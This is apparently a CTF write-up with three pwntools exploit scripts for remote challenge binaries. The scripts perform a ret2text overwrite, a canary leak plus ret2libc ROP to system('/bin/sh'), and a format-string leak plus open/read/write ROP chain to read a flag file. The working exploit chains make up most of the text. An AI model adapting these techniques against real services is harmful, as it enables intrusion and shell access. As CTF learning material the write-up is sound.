ret2text签到

签到,没什么好说的

from pwn import *

# ret2text: overwrite the saved return address with one fixed address in the
# binary (0x40115A). The 18-byte padding and the target address come from the
# challenge ELF, which is not part of this page, so neither can be checked here.
p=remote(b'xlctf.huhstsec.top',22903)
payload=b'a'*18+p64(0x40115A)

# send(), not sendline(): no trailing newline is appended to the chain.
p.send(payload)

# Hand the connection over to the terminal.
p.interactive()

ezlibc

溢出泄露canary+ret2libc

from pwn import *
# ezlibc: two rounds through main(). Round 1 leaks the stack canary and the
# runtime address of puts(); round 2 calls system("/bin/sh") through a ROP
# chain. All 0x40xxxx constants below were read off the challenge ELF (not on
# this page) and cannot be verified here.
context(log_level='debug')   # dump every send/recv; useful when re-checking offsets
# p=process('./pwn')

p=remote(b'xlctf.huhstsec.top',24021)
elf=ELF('./pwn')
# Local copy of the remote's libc. Every libc-relative offset used below is
# only valid if this build (2.27-3ubuntu1.5) really matches the server.
libc=ELF('/home/yfy/tools/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')


# --- round 1, step 1: canary leak ---
# 0x28 filler bytes reach the canary; sendline() appends '\n', which (judging
# by the -0xa correction below) lands on the canary's lowest byte -- presumably
# its null terminator, so the program's echo runs on into the canary. Confirm
# the 0x28 against the binary's stack layout.
pay1=b'a'*0x28
p.sendlineafter(b"I think it's easy to get the flag!",pay1)

# Skip the echoed filler; the next 8 bytes are the canary with its low byte
# replaced by 0x0a, hence the -0xa.
p.recvuntil(b'a'*0x28)

canary=u64(p.recv(8))-0xa
log.success(f"{hex(canary)}")


# --- round 1, step 2: puts(puts@got) to leak libc, then back into main ---
# Gadget addresses are as named by the author; their disassembly is not on
# this page.
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400843
ret=0x040059e   # written with a leading zero; same value as 0x40059e

offset=0x28   # same distance to the canary as pay1

main_addr=0x400764   # re-enter main for the second round

# padding | canary (restored unchanged so the check passes) | 8 bytes for saved rbp
payload=b'a'*offset+p64(canary)+b'a'*8

payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)   # puts(puts@got) prints the resolved puts address
payload+=p64(main_addr)



p.sendlineafter(b'Maybe UR closer to the key',payload)
p.recvuntil(b'keep trying\n')
# The address arrives as raw bytes (its 6 significant bytes, then puts's '\n').
# NOTE(review): the positional 6 is recvline's keepends argument, so the
# newline is kept and then removed by strip(); strip() would also remove a
# whitespace byte that belongs to the address itself if it happened to start
# or end with one -- the commented variant on the next line does not have
# that problem.
leak_addr= u64(p.recvline(6).strip().ljust(8,b'\00'))
#leak_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

log.success("leak_addr:{}".format((hex)(leak_addr)))



# libc base from the puts() leak; system and the "/bin/sh" string are then
# located by their offsets in the local libc copy.
libc_base=leak_addr-libc.sym['puts']
bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
system_addr=libc_base+libc.sym['system']


log.success("libc_base:{}".format((hex)(libc_base)))
log.success("system_addr:{}".format((hex)(system_addr)))
log.success("bin_sh_addr:{}".format((hex)(bin_sh_addr)))
# gdb.attach(p)
# pause()

# --- round 2: system("/bin/sh") ---
payload2=b'a'*offset+p64(canary)+b'a'*8
# The lone ret before pop_rdi is presumably for 16-byte stack alignment at the
# system() call -- confirm in a debugger if the call faults.
payload2+=p64(ret)+p64(pop_rdi)
payload2+=p64(bin_sh_addr)+p64(system_addr)
# main() is re-entered, so both prompts are presumably issued again: the first
# sendline answers the first prompt (its content only needs to keep the canary
# intact, which the reused round-1 payload does), the second delivers the
# chain. Neither waits for the prompt text.
p.sendline(payload)
p.sendline(payload2)


p.interactive()

你知道sandbox吗?

正确的libc应该是ubuntu22.04自带的libc

有格式化字符串的漏洞,泄露出libc和canary

接着直接orw就行了

from pwn import *
# "Do you know sandbox": a format-string leak of the canary and a libc pointer,
# followed by an open/read/write ROP chain (the writeup notes the remote libc is
# the stock Ubuntu 22.04 one). The 0x40xxxx addresses and the %17$p / %39$p
# positions come from the challenge binary, which is not on this page.
context(arch = 'amd64',os = 'linux',log_level = 'debug')
p=remote('xlctf.huhstsec.top',24130)
#p=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc.so.6')   # must match the server's libc for every offset below
# Two %p conversions: stack slot 17 (the canary) and slot 39 (a libc pointer),
# which is what the two parses further down assume.
pay=b'%17$p%39$p'
puts_plt = elf.plt["puts"]   # unused below
puts_got = elf.got["puts"]   # unused below

p.sendlineafter(b'Do you know orw?',pay)

# First "0x": 16 hex digits = the full 64-bit canary.
p.recvuntil('0x')

canary=int(p.recv(16),16)
log.success(f"canary>>>{hex(canary)}")

# Second "0x": 12 hex digits (a 48-bit user-space address). 0x29e40 is the
# offset of that leaked pointer inside this libc build -- it is build-specific,
# so confirm it against the libc actually in use.
p.recvuntil('0x')
libc_base=int(p.recv(12),16)-0x29e40
log.success(f"libc>>>{hex(libc_base)}")

jmp_rax=0x000000000040114c   # unused below

# Gadget and scratch addresses as named by the author; their disassembly is
# not on this page.
bss=0x404060   # writable scratch area; "./flag" is read in here
pop_rsi_r15=0x00000000004014c1
flag=bss+0x100   # buffer that receives the file contents
pop_rdi=0x00000000004014c3
pop_rdx_rbx=libc_base+0x0000000000090529   # lives in libc, hence libc_base-relative
ret=0x40401a

open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr=libc_base + libc.sym["write"]

# gdb.attach(p)
# pause()

# 0x30 padding, the canary, then a second copy of it filling the saved-rbp
# slot (any 8 bytes would presumably do there).
payload=b'a'*0x30+p64(canary)*2

# write ./flag to bss: read(?, bss, ?). NOTE(review): neither rdi nor rdx is
# set for this call, so it relies on whatever those registers hold at this
# point (rdi presumably still 0 = stdin). The path string itself is sent
# after the chain, see the final send() below.
payload+=p64(ret)+p64(pop_rsi_r15)+p64(bss)
payload+=p64(0)+ p64(read_addr)

#open: open(bss, 0 /* O_RDONLY */, 0); rsi=0 and r15=0, then rdx=0 and rbx=0
payload+=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)
payload+=p64(0)*2 +p64(pop_rdx_rbx)+p64(0)+p64(0)+p64(open_addr)

#read: read(3, flag, 0x100); fd 3 assumes the opened file got the first free descriptor
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(flag)+p64(0)
payload+=p64(pop_rdx_rbx)+p64(0x100) + p64(0)+ p64(read_addr)
# print out the flag: write(1, flag, 50)
payload+=p64(pop_rdi)+ p64(1) +p64(pop_rsi_r15)+p64(flag)+p64(0)
payload+=p64(pop_rdx_rbx)+p64(50)+p64(1)+p64(write_addr)

# sendafter(): no newline is appended to the chain.
p.sendafter(b'can you did it?',payload)
# Consumed by the chain's first read() into bss; the NUL terminates the path.
p.send(b'./flag\x00')

p.interactive()